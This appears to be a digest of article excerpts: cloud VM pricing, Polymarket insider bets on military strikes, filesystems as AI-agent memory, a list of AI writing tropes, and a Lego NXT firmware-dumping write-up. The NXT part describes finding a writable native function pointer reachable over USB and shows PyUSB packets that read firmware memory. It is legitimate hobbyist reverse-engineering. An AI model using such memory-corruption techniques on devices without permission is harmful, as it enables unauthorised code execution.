The 1-year discount is enough for GCP’s Turin to match Oracle near the top of the value ranking. On Azure you get some good value running Cobalt 100 or Genoa. If you are on AWS your best bet are the latest C8 family.
Moving on to evaluating multi-threaded performance using 2x vCPUs:
OCI ARM instances are still at the top, joined by Azure Cobalt 100 with Axion almost keeping up. This is the first instance where AWS can offer similar value, thanks to the C8a with the fast Turin offering twice the physical cores, making up for the higher price.
Finally, for very long term commitments, AWS, GCP and Azure provide 3-year reserved discounts:
GCP with its Turin instances finally comes just ahead of Oracle and even Hetzner’s dedicated VM. Azure also provide good value with their Cobalt 100 and Turin types. It should be noted that even if AWS lags behind the other, at a 3 year commitment it still offers better value than the “classic” value providers Akamai and DigitalOcean.
Switching to multi-thread, the number of physical cores per vCPU makes the difference:
I didn’t expect this, but Azure Cobalt 100 tops the chart! It is followed by GCP and OCI ARM solutions, but AWS’s and GCP’s Turin are not far behind.
The large providers (AWS, GCP, Azure, OCI) offer their spare VM capacity at an - often heavy - discount, with the understanding that these instances can be reclaimed at any time when needed by other customers. This “spot” or “preemptible” VM instance pricing is by far the most cost-effective way to add compute to your cloud. Obviously, it is not applicable to all use cases, but if you have a fault-tolerant workload or can gracefully interrupt your processing and rebuild your server to continue, this might be for you.
AWS and OCI will give you a 2-minute warning before your instance is terminated. Azure and GCP will give you 30 seconds, which should still be enough for many use cases (e.g. web servers, batch processing etc).
The discount for Oracle’s instances is fixed at 50%, but varies wildly for the other providers per region and can change often, so you have to be on top of it to adjust you instance types accordingly.
For a longer discussion on spot instances see 2023′s spot performance/price comparison. Then you can come back to this year’s results below.
Applying the lowest January 2026 US spot prices we get:
...
Read the original on devblog.ecuadors.net »
Ayatollah Ali Khamenei was not, it’s safe to assume, a devoted Polymarket user. If he had been, the Iranian leader might still be alive. Hours before Khamenei’s compound in Tehran was reduced to rubble last week, an account under the username “magamyman” bet about $20,000 that the supreme leader would no longer be in power by the end of March. Polymarket placed the odds at just 14 percent, netting “magamyman” a profit of more than $120,000.
Everyone knew that an attack might be in the works—some American aircraft carriers had already been deployed to the Middle East weeks ago—but the Iranian government was caught off guard by the timing. Although the ayatollah surely was aware of the risks to his life, he presumably did not know that he would be targeted on this particular Saturday morning. Yet on Polymarket, plenty of warning signs pointed to an impending attack. The day before, 150 users bet at least $1,000 that the United States would strike Iran within the next 24 hours, according to a New York Times analysis. Until then, few people on the platform were betting that kind of money on an immediate attack.
Maybe all of this sounds eerily familiar. In January, someone on Polymarket made a series of suspiciously well-timed bets right before the U. S. attacked a foreign country and deposed its leader. By the time Nicolás Maduro was extracted from Venezuela and flown to New York, the user had pocketed more than $400,000. Perhaps this trader and the Iran bettors who are now flush with cash simply had the luck of a lifetime—the gambling equivalent of making a half-court shot. Or maybe they knew what was happening ahead of time and flipped it for easy money. We simply do not know.
Polymarket traders swap crypto, not cash, and conceal their identities through the blockchain. Even so, investigations into insider trading are already underway: Last month, Israel charged a military reservist for allegedly using classified information to make unspecified bets on Polymarket.
The platform forbids illegal activity, which includes insider trading in the U. S. But with a few taps on a smartphone, anyone with privileged knowledge can now make a quick buck (or a hundred thousand). Polymarket and other prediction markets—the sanitized, industry-favored term for sites that let you wager on just about anything—have been dogged by accusations of insider trading in markets of all flavors. How did a Polymarket user know that Lady Gaga, Cardi B, and Ricky Martin would make surprise appearances during the Super Bowl halftime show, but that Drake and Travis Scott wouldn’t? Shady bets on war are even stranger and more disturbing. They risk unleashing an entirely new kind of national-security threat. The U.S. caught a break: The Venezuela and Iran strikes were not thwarted by insider traders whose bets could have prompted swift retaliation. The next time, we may not be so lucky.
The attacks in Venezuela and Iran—like so many military campaigns—were conducted under the guise of secrecy. You don’t swoop in on an adversary when they know you are coming. The Venezuela raid was reportedly so confidential that Pentagon officials did not know about its exact timing until a few hours before President Trump gave the orders.
Any insiders who put money down on impending war may not have thought that they were giving anything away. An anonymous bet that reeks of insider trading is not always easy to spot in the moment. After the suspicious Polymarket bets on the Venezuela raid, the site’s forecast placed the odds that Maduro would be ousted at roughly 10 percent. Even if Maduro and his team had been glued to Polymarket, it’s hard to imagine that such long odds would have compelled him to flee in the middle of the night. And even with so many people betting last Friday on an imminent strike in Iran, Polymarket forecasted only a 26 percent chance, at most, of an attack the next day. What’s the signal, and what’s the noise?
In both cases, someone adept at parsing prediction markets could have known that something was up. “It’s possible to spot these bets ahead of time,” Rajiv Sethi, a Barnard College economist who studies prediction markets, told me. There are some telltale behaviors that could help distinguish a military contractor betting off a state secret from a college student mindlessly scrolling on his phone after one too many cans of Celsius. Someone who’s using a newly created account to wager a lot of money against the conventional wisdom is probably the former, not the latter. And spotting these kinds of suspicious bettors is only getting easier. The prediction-market boom has created a cottage industry of tools that instantaneously flag potential insider trading—not for legal purposes but so that you, too, can profit off of what the select few already know.
Unlike Kalshi, the other big prediction-market platform, Polymarket can be used in the U. S only through a virtual private network, or VPN. In effect, the site is able to skirt regulations that require tracking the identities of its customers and reporting shady bets to the government. In some ways, insider trading seems to be the whole point: “What’s cool about Polymarket is that it creates this financial incentive for people to go and divulge the information to the market,” Shayne Coplan, the company’s 27-year-old CEO, said in an interview last year. (Polymarket did not respond to a request for comment.)
Consider if the Islamic Revolutionary Guard Corps had paid the monthly fee for a service that flagged relevant activity on Polymarket two hours before the strike. The supreme leader might not have hosted in-person meetings with his top advisers where they were easy targets for missiles. Perhaps Iran would have launched its own preemptive strikes, targeting military bases across the Middle East. Six American service members have already died from Iran’s drone attacks in the region; the death toll could have been higher if Iran had struck first. In other words, someone’s idea of a get-rich-quick scheme may have ended with a military raid gone horribly awry. (The Department of Defense did not respond to a request for comment.)
Maybe this all sounds far-fetched, but it shouldn’t. “Any advance notice to an adversary is problematic,” Alex Goldenberg, a fellow at the Rutgers Miller Center who has written about war markets, told me. “And these predictive markets, as they stand, are designed to leak out this information.” In all likelihood, he added, intelligence agencies across the world are already paying attention to Polymarket. Last year, the military’s bulletin for intelligence professionals published an article advocating for the armed forces to integrate data from Polymarket to “more fully anticipate national security threats.” After all, the Pentagon already has some experience with prediction markets. During the War on Terror, DARPA toyed with creating what it billed the “Policy Analysis Market,” a site that would let anonymous traders bet on world events to forecast terrorist attacks and coups. (Democrats in Congress revolted, and the site was quickly canned.)
Now every adversary and terrorist group in the world can easily access war markets that are far more advanced than what the DOD ginned up two decades ago. What makes Polymarket’s entrance into warfare so troubling is not just potential insider trading from users like “magamyman.” If governments are eyeing Polymarket for signs of an impending attack, they can also be led astray. A government or another sophisticated actor wouldn’t need to spend much money to massively swing the Polymarket odds on whether a Gulf state will imminently strike Iran—breeding panic and paranoia. More fundamentally, prediction markets risk warping the basic incentives of war, Goldenberg said. He gave the example of a Ukrainian military commander making less than $1,000 a month, who could place bets that go against his own military’s objective. “Maybe you choose to retreat a day early because you can double, triple, or quadruple your money and then send that back to your family,” he said.
Again, we don’t know for sure whether any of this is happening. That may be the scariest part. As long as Polymarket lets anyone bet on war anonymously, we may never know. Last Saturday, the day of the initial Iran attack, Polymarket processed a record $478 million in bets, according to one analysis. All the while, Polymarket continues to wedge itself into the mainstream. Substack recently struck a partnership with Polymarket to incorporate the platform’s forecasts into its newsletters. (“Journalism is better when it’s backed by live markets,” Polymarket posted on X in announcing the deal.) All of this makes the site even more valuable as an intelligence asset, and even more destructive for the rest of us. Polymarket keeps launching more war markets: Will the U. S. strike Iraq? Will Israel strike Beirut? Will Iran strike Cyprus? Somewhere out there, someone likely already knows the answers.
...
Read the original on www.theatlantic.com »
I used to work at a vector database company. My entire job was helping people understand why they needed a database purpose-built for AI; embeddings, semantic search, the whole thing. So it’s a little funny that I’m writing this. But here I am, watching everyone in the AI ecosystem suddenly rediscover the humble filesystem, and I think they might be onto something bigger than most people realize.
Not bigger than databases. Different from databases. I need to say that upfront because I already know someone is going to read this and think I’m saying “files good, databases bad.” I’m not. Stay with me.
If you’ve been paying any attention to the AI agent space over the last few months, you’ve noticed something strange. LlamaIndex published “Files Are All You Need.” LangChain wrote about how agents can use filesystems for context engineering. Oracle, yes Oracle (who is cooking btw), put out a piece comparing filesystems and databases for agent memory. Dan Abramov wrote about a social filesystem built on the AT Protocol. Archil is building cloud volumes specifically because agents want POSIX file systems.
Jerry Liu from LlamaIndex put it bluntly: instead of one agent with hundreds of tools, we’re moving toward a world where the agent has access to a filesystem and maybe 5-10 tools. That’s it. Filesystem, code interpreter, web access. And that’s as general, if not more general than an agent with 100+ MCP tools.
Karpathy made the adjacent observation that stuck with me. He pointed out that Claude Code works because it runs on your computer, with your environment, your data, your context. It’s not a website you go to — it’s a little spirit that lives on your machine. OpenAI got this wrong, he argued, by focusing on cloud deployments in containers orchestrated from ChatGPT instead of simply running on localhost.
And here’s the thing that makes all of this matter commercially: coding agents make up the majority of actual AI use cases right now. Anthropic is reportedly approaching profitability, and a huge chunk of that is driven by Claude Code, a CLI tool. Not a chatbot. A tool that reads and writes files on your filesystem.
Here’s where I think most of the discourse misses the deeper point.
Memory; in the human, psychological sense is fundamental to how we function. We don’t re-read our entire life story every time we make a decision. We have long-term storage, selective recall, the ability to forget things that don’t matter and surface things that do. Context windows in LLMs are none of that. They’re more like a whiteboard that someone keeps erasing.
If you’ve used Claude Code for any real project, you know the dread of watching that “context left until auto-compact” notification creep closer. Your entire conversation, all the context the agent has built up about your codebase, your preferences, your decisions about to be compressed or lost.
Filesystems solve this in the most boring, obvious way possible. Write things down. Put them in files. Read them back when you need them. Claude’s CLAUDE.md file gives the agent persistent context about your project. Cursor stores past chat history as searchable files. People are writing aboutme.md files that act as portable identity descriptors any agent can read i.e. your preferences, your skills, your working style, all in a file that moves between applications without anyone needing to coordinate an API.
Except! It might not be quite that simple.
A recent paper from ETH Zürich evaluated whether these repository-level context files actually help coding agents complete tasks. The finding was counterintuitive: across multiple agents and models, context files tended to reduce task success rates while increasing inference cost by over 20%. Agents given context files explored more broadly, ran more tests, traversed more files — but all that thoroughness delayed them from actually reaching the code that needed fixing. The files acted like a checklist that agents took too seriously.
This sounds like it undermines the whole premise. But I think it actually sharpens it. The paper’s conclusion wasn’t “don’t use context files.” It was that unnecessary requirements make tasks harder, and context files should describe only minimal requirements. The problem isn’t the filesystem as a persistence layer. The problem is people treating CLAUDE.md like a 2,000-word onboarding document instead of a concise set of constraints. Which brings us to the question of standards.
Right now we have CLAUDE.md, AGENTS.md, copilot-instructions.md, .cursorrules, and probably five more by the time you read this. Everyone agrees that agents need persistent filesystem-based context. Nobody agrees on what the file should be called or what should go in it. I see efforts to consolidate, this is good.
Dan Abramov’s piece on a social filesystem crystallized something important here. He describes how the AT Protocol treats user data as files in a personal repository; structured, owned by the user, readable by any app that speaks the format. The critical design choice is that different apps don’t need to agree on what a “post” is. They just need to namespace their formats (using domain names, like Java packages) so they don’t collide. Apps are reactive to files. Every app’s database becomes derived data i.e. a cached materialized view of everybody’s folders.
The same tension exists in the agent context file space. We don’t need CLAUDE.md and AGENTS.md and copilot-instructions.md to converge into one file. We need them to coexist without collision. And to be fair, some convergence is happening. Anthropic released Agent Skills as an open standard, a SKILL.md format that Microsoft, OpenAI, Atlassian, GitHub, and Cursor have all adopted. A skill you write for Claude Code works in Codex, works in Copilot. The file format is the API.
NanoClaw, a lightweight personal AI assistant framework, takes this to its logical conclusion. Instead of building an ever-expanding feature set, it uses a “skills over features” model. Want Telegram support? There’s no Telegram module. There’s a /add-telegram skill, essentially a markdown file that teaches Claude Code how to rewrite your installation to add the integration. Skills are just files. They’re portable, auditable, and composable. No MCP server required. No plugin marketplace to browse. Just a folder with a SKILL.md in it.
This is interoperability without coordination. And I want to be specific about what I mean by that, because it’s a strong claim. In tech, getting two competing products to work together usually requires either a formal standard that takes years to ratify, or a dominant platform that forces compatibility. Files sidestep both. If two apps can read markdown, they can share context. If they both understand the SKILL.md format, they can share capabilities. Nobody had to sign a partnership agreement. Nobody had to attend a standards body meeting. The file format does the coordinating.
There’s a useful analogy from infrastructure. Traditional data architectures were designed around the assumption that storage was the bottleneck. The CPU waited for data from memory or disk, and computation was essentially reactive to whatever storage made available. But as processing power outpaced storage I/O, the paradigm shifted. The industry moved toward decoupling storage and compute, letting each scale independently, which is how we ended up with architectures like S3 plus ephemeral compute clusters. The bottleneck moved, and everything reorganized around the new constraint.
Something similar is happening with AI agents. The bottleneck isn’t model capability or compute. It’s context. Models are smart enough. They’re just forgetful. And filesystems, for all their simplicity, are an incredibly effective way to manage persistent context at the exact point where the agent runs — on the developer’s machine, in their environment, with their data already there.
Now, I’d be a frawd if I didn’t acknowledge the tension here. Someone on Twitter joked that “all of you saying you don’t need a graph for agents while using the filesystem are just in denial about using a graph.” And… they’re not wrong. A filesystem is a tree structure. Directories, subdirectories, files i.e. a directed acyclic graph. When your agent runs ls, grep, reads a file, follows a reference to another file, it’s traversing a graph.
Richmond in Oracle’s piece made the sharpest distinction I’ve seen: filesystems are winning as an interface, databases are winning as a substrate. The moment you want concurrent access, semantic search at scale, deduplication, recency weighting — you end up building your own indexes. Which is, let’s be honest, basically a database.
Having worked at Weaviate, I can tell you that this isn’t an either/or situation. The file interface is powerful because it’s universal and LLMs already understand it. The database substrate is powerful because it provides the guarantees you need when things get real. The interesting future isn’t files versus databases. It’s files as the interface humans and agents interact with, backed by whatever substrate makes sense for the use case.
Here’s my actual take on all of this, the thing I think people are dancing around but not saying directly.
Filesystems can redefine what personal computing means in the age of AI.
Not in the “everything runs locally” sense (but maybe?). In the sense that your data, your context, your preferences, your skills, your memory — lives in a format you own, that any agent can read, that isn’t locked inside a specific application. Your aboutme.md works with your flavour of OpenClaw/NanoClaw today and whatever comes tomorrow. Your skills files are portable. Your project context persists across tools.
This is what personal computing was supposed to be before everything moved into walled-garden SaaS apps and proprietary databases. Files are the original open protocol. And now that AI agents are becoming the primary interface to computing, files are becoming the interoperability layer that makes it possible to switch tools, compose workflows, and maintain continuity across applications, all without anyone’s permission.
I’ll admit this is a bit idealistic. The history of open formats is littered with standards that won on paper and lost in practice. Companies have strong incentives to make their context files just different enough that switching costs remain high. The fact that we already have CLAUDE.md and AGENTS.md and .cursorrules coexisting rather than one universal format, is evidence that fragmentation is the default, not the exception. And the ETH Zürich paper is a reminder that even when the format exists, writing good context files is harder than it sounds. Most people will write bad ones, and bad context files are apparently worse than none at all.
But I keep coming back to something Dan Abramov wrote: our memories, our thoughts, our designs should outlive the software we used to create them. That’s not a technical argument. It’s a values argument. And it’s one that the filesystem, for all its age and simplicity, is uniquely positioned to serve. Not because it’s the best technology. But because it’s the one technology that already belongs to you.
...
Read the original on madalitso.me »
A single file containing all cataloged AI writing tropes. Add it to your AI’s system prompt to help it avoid these patterns (let’s play cat and mouse!).
Disclaimer: Creation of this file was AI-assisted. If you thought I was going to write out a .md file for AI myself you must be mad. AI for AI. Human for Human.
# AI Writing Tropes to Avoid
Add this file to your AI assistant’s system prompt or context to help it avoid
common AI writing patterns. Source: tropes.fyi
## Word Choice
### “Quietly” and Other Magic Adverbs
Overuse of “quietly” and similar adverbs to convey subtle importance or understated power. AI reaches for these adverbs to make mundane descriptions feel significant. Also includes: “deeply”, “fundamentally”, “remarkably”, “arguably”.
**Avoid patterns like:**
- “quietly orchestrating workflows, decisions, and interactions”
- “the one that quietly suffocates everything else”
- “a quiet intelligence behind it”
### “Delve” and Friends
Used to be the most infamous AI tell. “Delve” went from an uncommon English word to appearing in a staggering percentage of AI-generated text. Part of a family of overused AI vocabulary including “certainly”, “utilize”, “leverage” (as a verb), “robust”, “streamline”, and “harness”.
**Avoid patterns like:**
- “Let’s delve into the details…”
- “Delving deeper into this topic…”
- “We certainly need to leverage these robust frameworks…”
### “Tapestry” and “Landscape”
Overuse of ornate or grandiose nouns where simpler words would do. “Tapestry” is used to describe anything interconnected. “Landscape” is used to describe any field or domain. Other offenders: “paradigm”, “synergy”, “ecosystem”, “framework”.
**Avoid patterns like:**
- “The rich tapestry of human experience…”
- “Navigating the complex landscape of modern AI…”
- “The ever-evolving landscape of technology…”
### The “Serves As” Dodge
Replacing simple “is” or “are” with pompous alternatives like “serves as”, “stands as”, “marks”, or “represents”. AI avoids basic copulas because its repetition penalty pushes it toward fancier constructions (I’ve studied this!).
**Avoid patterns like:**
- “The building serves as a reminder of the city’s heritage.”
- “Gallery 825 serves as LAAA’s exhibition space for contemporary art.”
- “The station marks a pivotal moment in the evolution of regional transit.”
## Sentence Structure
### Negative Parallelism
The “It’s not X — it’s Y” pattern, often with an em dash. The single most commonly identified AI writing tell. Man I f*cking hate it. AI uses this to create false profundity by framing everything as a surprising reframe. One in a piece can be effective; ten in a blog post is a genuine insult to the reader. Before LLMs, people simply did not write like this at scale. Includes the causal variant “not because X, but because Y” where every explanation is framed as a surprise reveal.
**Avoid patterns like:**
- “It’s not bold. It’s backwards.”
- “Feeding isn’t nutrition. It’s dialysis.”
- “Half the bugs you chase aren’t in your code. They’re in your head.”
### “Not X. Not Y. Just Z.”
The dramatic countdown pattern. AI builds tension by negating two or more things before revealing the actual point. Creates a false sense of narrowing down to the truth.
**Avoid patterns like:**
- “Not a bug. Not a feature. A fundamental design flaw.”
- “Not ten. Not fifty. Five hundred and twenty-three lint violations across 67 files.”
- “not recklessly, not completely, but enough”
### “The X? A Y.”
Self-posed rhetorical questions answered immediately in the next sentence or clause. The model asks a question nobody was asking, then answers it for dramatic effect. Thinks this is the epitome of great writing.
**Avoid patterns like:**
- “The result? Devastating.”
- “The worst part? Nobody saw it coming.”
- “The scary part? This attack vector is perfect for developers.”
### Anaphora Abuse
Repeating the same sentence opening multiple times in quick succession.
**Avoid patterns like:**
- “They assume that users will pay… They assume that developers will build… They assume that ecosystems will emerge… They assume that…”
- “They could expose… They could offer… They could provide… They could create… They could let… They could unlock…”
- “They have built engines, but not vehicles. They have built power, but not leverage. They have built walls, but not doors.”
### Tricolon Abuse
Overuse of the rule-of-three pattern, often extended to four or five. A single tricolon is elegant; three back-to-back tricolons are a pattern recognition failure.
**Avoid patterns like:**
- “Products impress people; platforms empower them. Products solve problems; platforms create worlds. Products scale linearly; platforms scale exponentially.”
- “identity, payments, compute, distribution”
- “workflows, decisions, and interactions”
### “It’s Worth Noting”
Filler transitions that signal nothing. AI uses these phrases to introduce new points without actually connecting them to the previous argument. Also includes: “It bears mentioning”, “Importantly”, “Interestingly”, “Notably”.
**Avoid patterns like:**
- “It’s worth noting that this approach has limitations.”
- “Importantly, we must consider the broader implications.”
- “Interestingly, this pattern repeats across industries.”
### Superficial Analyses
Tacking a present participle (“-ing”) phrase onto the end of a sentence to inject shallow analysis that says nothing. The model attaches significance, legacy, or broader meaning to mundane facts using phrases like “highlighting its importance”, “reflecting broader trends”, or “contributing to the development of…”.
**Avoid patterns like:**
- “contributing to the region’s rich cultural heritage”
- “This etymology highlights the enduring legacy of the community’s resistance and the transformative power of unity in shaping its identity.”
- “underscoring its role as a dynamic hub of activity and culture”
### False Ranges
Using “from X to Y” constructions where X and Y aren’t on any real scale. In legitimate use, “from X to Y” implies a spectrum with a meaningful middle. AI uses it as a fancy way to list two loosely related things. “From innovation to cultural transformation” — what’s in between???? Nothing!
**Avoid patterns like:**
- “From innovation to implementation to cultural transformation.”
- “From the singularity of the Big Bang to the grand cosmic web.”
- “From problem-solving and tool-making to scientific discovery, artistic expression, and technological innovation.”
### Gerund Fragment Litany
After making a claim, AI illustrates it with a stream of verbless gerund fragments — standalone sentences with no grammatical subject. “Fixing small bugs. Writing straightforward features. Implementing well-defined tickets.” The first sentence already said everything. The fragments add nothing except word count and that familiar AI cadence. Humans don’t write first drafts this way. It’s a pure structural tic.
**Avoid patterns like:**
- “Fixing small bugs. Writing straightforward features. Implementing well-defined tickets.”
- “Reviewing pull requests. Debugging edge cases. Attending architecture meetings.”
- “Shipping faster. Moving quicker. Delivering more.”
## Paragraph Structure
### Short Punchy Fragments
Excessive use of very short sentences or sentence fragments as standalone paragraphs for manufactured emphasis. RLHF training has pushed models toward “writing for readability” aimed at the lowest common denominator: one thought per sentence, no mental state-keeping required. It’s an inhuman style. No real person writes first drafts this way because it doesn’t match how humans think or speak.
**Avoid patterns like:**
- “He published this. Openly. In a book. As a priest.”
- “These weren’t just products. And the software side matched. Then it professionalised. But I adapted.”
- “Platforms do.”
### Listicle in a Trench Coat
Numbered or labeled points dressed up as continuous prose. The model writes what is essentially a listicle but wraps each point in a paragraph that starts with “The first… The second… The third…” to disguise the format. Perhaps you told it to stop generating lists and it decided to do this instead… still very common.
**Avoid patterns like:**
- “The first wall is the absence of a free, scoped API… The second wall is the lack of delegated access… The third wall is the absence of scoped permissions…”
- “The second takeaway is that… The third takeaway is that… The fourth takeaway is that…”
## Tone
### “Here’s the Kicker”
False suspense transitions that promise a revelation but deliver a point that did NOT need the buildup. The model uses these phrases to manufacture drama before an otherwise unremarkable observation LOL. Also includes: “Here’s the thing”, “Here’s where it gets interesting”, “Here’s what most people miss”.
...
Read the original on tropes.fyi »
Dumping Lego NXT firmware off of an existing brick
I’ve recently been contributing to the Pybricks project, a community-run port of MicroPython to Lego Mindstorms hardware. As part of that, I obtained a used Lego NXT which just so happened to still be running the original version 1.01 firmware from when it launched in 2006. I wanted to archive a copy of this firmware, and doing so happened to involve the discovery of arbitrary code execution.
The NXT is a relatively simple exploitation target and can serve as a good introduction to ARM and embedded exploit development.
Or, in the words of a much more innocent era, “Google is your friend” .
“Surely somebody must’ve already archived a copy of this firmware, right?” I thought to myself. Unfortunately, this does not appear to have been the case. I searched but never came across a copy of this particular firmware version despite the extensive NXT enthusiast community.
I did come across a mention of a 1.03 firmware which appears to have been released on or very close to launch day. I suspect that enthusiasts and advanced users likely eagerly switched to newer and/or community-modified firmwares when they wanted newer features.
The NXT is also old enough that, despite being part of “the Internet era”, resources are starting to bitrot.
Looks like I’m going to have to figure out how to retrieve a copy myself!
The first idea which came to mind for backing up firmware is “does the tool which is used to download new firmware to the NXT also allow retrieving the preexisting firmware?”
From sources including the Wikipedia page, we find that the NXT is built around a Microchip (formerly Atmel) AT91SAM7S256 microcontroller, a distant ancestor of the SAM D parts that now power several Arduino, MicroPython, and CircuitPython boards. This chip contains a built-in bootloader program called SAM-BA which supports simple “read from memory” (traditionally known as PEEK) and “write to memory” (traditionally known as POKE) commands. This (deceptively!) seems like it’d work!
Fortunately, while researching, I found out that somebody did try this already and was unsuccessful. Attempting to enter the SAM-BA bootloader appears to automatically overwrite part of the firmware which we want to back up. Good thing I did my research first! We have to find a different approach that doesn’t involve entering firmware update mode.
JTAG is a hardware interface used for providing all sorts of “debug” and “test” functionality for circuit boards and chips. Precisely what can be done using JTAG varies greatly, but the microcontroller in the NXT allows JTAG to read and modify all of the CPU’s state for debugging. This can be used to read back data stored inside the chip.
Is this related to using JTAG to hack an Xbox or a mobile phone?
Yes! Those devices also use the same low-level protocol known as JTAG. However, the debug and test commands which can be used on top of JTAG are completely different. Think of JTAG as being similar to TCP or UDP while the chip-specific commands are higher-level protocols such as HTTP or SSH.
Unfortunately, since this is a hardware interface, using it involves taking apart the NXT and soldering to it (since the necessary connectors are not installed). Additionally, this chip is so old that its debug interface is cumbersome to set up and use (it doesn’t support , , or any of the interfaces and protocols that the cheap modern tools are designed for).
I considered this method a last resort but really wanted to find a software-only solution. Software-only solutions are generally easier to share and deploy, so finding one would allow many other people to also back up the firmware of bricks in their possession.
For a device like the NXT which already allows for limited user-programmability, the first instinct is usually to explore what this limited or “sandboxed” environment allows you to do. How do NXT programs work? Can we just write an NXT program that dumps the firmware and sends it to the computer?
If we hunt around, we can find the “LEGO MINDSTORMS NXT Executable File Specification” which explains that NXT programs run in a bytecode and doesn’t have the ability to read/write arbitrary memory. Variables are restricted to a “data segment” of fixed size, and all memory accesses must be inside it. This means that we cannot “just” write an NXT program (unless we find a bug in the VM which allows us to access memory we’re not supposed to).
What is the difference between a VM and “native” code?
“Native” code refers to code which a CPU can directly run. A virtual machine is a way of adding a layer of indirection between a program and the real CPU. Computer scientists love solving problems by adding indirection, and a virtual machine can be used to solve problems such as incompatibility, convenience, and/or security.
For example, a virtual machine can be used to take code designed for one type of CPU and run it on a different type of CPU. This is often called an emulator, and they can be useful when it isn’t possible to recompile the code for the new CPU (such as if the original program is a closed-source video game for a proprietary game console but you want to run it on a desktop PC).
Java and .NET run on virtual machines which are specifically designed so that managing memory is more convenient (such as by having garbage collection). They can also be used to implement security by funneling “dangerous” operations into specific, limited pathways. The NXT’s virtual machine is a virtual machine of this type.
For those who aren’t aware, the source code of the NXT firmware is publicly available! However, many links to it have bitrotted, source code only seems to have been released for some versions (certainly not every), and it’s not even clear which versions of the code have been archived and still exist. (For example, the seemingly-official LEGO-Robotics/NXT-Firmware repository on GitHub… is actually a community-modified firmware! Its history also only contains versions 1.05 and 1.29 specifically and not, for example, the final 1.31 or the original 1.01.)
Nonetheless, we can still study it to see if we can find anything interesting. At the same time, we can also study a copy of the NXT Bluetooth Developer Kit in order to understand how the computer communicates with the brick. (Despite being the “Bluetooth” developer kit, the documented protocol and commands are used over USB as well.)
From reading through the “LEGO MINDSTORMS NXT Communication Protocol” and “LEGO MINDSTORMS NXT Direct Commands” documents, we start to see the following high-level overview:
The protocol contains two categories of commands, “system” and “direct”. System commands vaguely relate to “operating system” functionality, and direct commands vaguely relate to “actually operating a robot”. In general, this protocol also seems to specifically not allow performing arbitrary operations and badness such as accessing the firmware or getting native code execution outside of the VM. It appears to be designed to give friendly access to only the NXT’s virtual filesystem and bytecode interpreter.
Since both the VM and the communications protocol appear to be designed to keep us out, it’s starting to look like we’re going to need to find some kind of exploit.
While looking through all of these documents, I generally focused my attention on “low-level” functionality, as it is much more likely to contain the ability to access the firmware and/or arbitrary memory. One feature, “IO-Maps”, immediately stood out.
In the NXT Communication Protocol document, IO-Maps are described as “the well-described layer between the different controllers/drivers stack and the VM running the user’s code.” That sounds potentially interesting if it allows access to drivers in ways which aren’t normally allowed. Also, if this is an interface which isn’t normally used, it is a potential location for unexpected and exploitable bugs.
So… where does one find the so-called “well-described” description of what IO-Maps can do?
One of the best explanations I found was an old copy of the NXC programmer’s guide. NXC (Not eXactly C) is an alternative frontend for creating NXT programs for the stock firmware in a C-like language rather than graphical blocks. This programmer’s guide lists all of the IO-Map offsets for each firmware module, and the explanations make it clear that IO-Maps contain essentially all of each module’s internal state.
Further searching finds this blog post explaining how it’s possible to watch and plot variables in the user program by reading from the VM module’s IO-Map. It definitely feels like we could be on to something here!
How do you find the IO-Map structures in the firmware source code? That blog post lists a struct, but where is said struct?
It turns out that all IO-Maps are defined in .iom files in the firmware, with the VM’s being defined in c_cmd.iom.
Without even having to look at any other modules, we can already spot something: the VM IO-Map contains a function pointer pRCHandler! What does this function pointer do?
It turns out that this is the command handler for “direct” commands!
Is this… really just a native code function pointer sitting inside this IO-Map structure which is both readable and writable over USB?
What is a function pointer? Why is finding a function pointer such a big deal?
A function pointer is a piece of data which stores the location of some code. A program uses this data to decide what code to run next. Programs themselves can modify function pointers in order to alter their functionality as they run, but, if we can modify the function pointer, we can also alter what the program does, including in ways that may be unintended.
In order to try out whether this even has a chance of working, we will need to send commands to the NXT over USB. This can be done in many different ways, but here we will use the Python programming language. Python is very suitable for testing and prototyping because it has a and many third-party libraries implementing functionality that we can reuse. In this case, we will use the PyUSB library to talk to the NXT.
Setting up Python, creating a virtualenv, installing PyUSB, installing USB drivers, and configuring USB permissions will all be left as an exercise for the reader. This is all very important, but “setting up and configuring a development environment” is a huge task all on its own, requiring tons of often-poorly-documented implicit knowledge, and I wanted to get this article done in a reasonable amount of time.
First we need to open a connection to the NXT:
Then we need to see if we can indeed access the VM (or “command”) module’s IO-Map:
Ah yes. Most people have not invested years into skills such as staring at hex dumps and raw data. I’ll have to give a more detailed explanation.
We want to send the “Read IO Map Command” to the NXT. This command is documented on page 20 of the “LEGO MINDSTORMS NXT Communication Protocol” document, and the request is documented to take 10 bytes. Here we’re manually inputting each of the bytes using a hexadecimal escape sequence.
The first two bytes are required to be 0x01 and 0x94: \x01\x94.
This is followed by the module ID in little-endian format: \x01\x00\x01\x00. This corresponds to a module ID of 0x00010001 which is the ID of the VM module.
When a value is stored using more than one byte, the bytes have to be stored in a particular order, just like how decimal numbers with multiple digits have to be written in a particular order. “Little-endian” is the “opposite” or “backwards” order from how Arabic numerals are written, meaning that the “first” or “leftmost” byte has the lowest place value. This byte is called the “LSB” or “least-significant byte”. The “last” or “rightmost” byte has the highest place value and is called the “MSB” or “most-significant byte”.
“Big-endian” is the opposite of little-endian and matches the order of Arabic numerals. The “endian” names are a historical artifact.
TL;DR it means you have to flip the bytes around
The next two bytes \x00\x00 correspond to an offset of 0.
Finally, the last two bytes \x10\x00 correspond to a length of 0x10 or 16.
In summary, this command means “read 16 bytes from offset 0 of the VM module’s IO-Map”.
To actually send the command to the NXT, we write it to USB endpoint 1. To read the response, we send a read command to USB endpoint 0x82 (don’t worry about it).
But I am worried about it!
Understanding this requires a minimal understanding of how the USB device framework works. An excellent overview can be found here. In short, when talking to a USB device, data needs to be sent to or received from specific endpoints. A device can have multiple endpoints of different types and directions. Each endpoint is identified by an address, which can be found in the USB descriptors. The NXT uses two “bulk” endpoints, one in each direction, and their addresses are 0x01 and 0x82.
If we decode the response according to the documentation, we find that the first bytes \x02\x94 are exactly as specified under the “return package” heading.
The next byte, \x00, means that the command succeeded.
This is followed by a repeat of the module ID \x01\x00\x01\x00 and the requested length \x10\x00.
Finally, we have the data which was read: MindstormsNXT\x00\x00\x00. This data corresponds to FormatString in the code, and here it is initialized to the MindstormsNXT value that we see.
Let’s try reading that function pointer now:
It helps to see the difference if we line up the two commands:
We’ve changed the offset from \x00\x00 to \x10\x00 (from 0 to 16). We’ve changed the length from \x10\x00 to \x04\x00 (from 16 to 4). (Remember that all the numbers are in little-endian!)
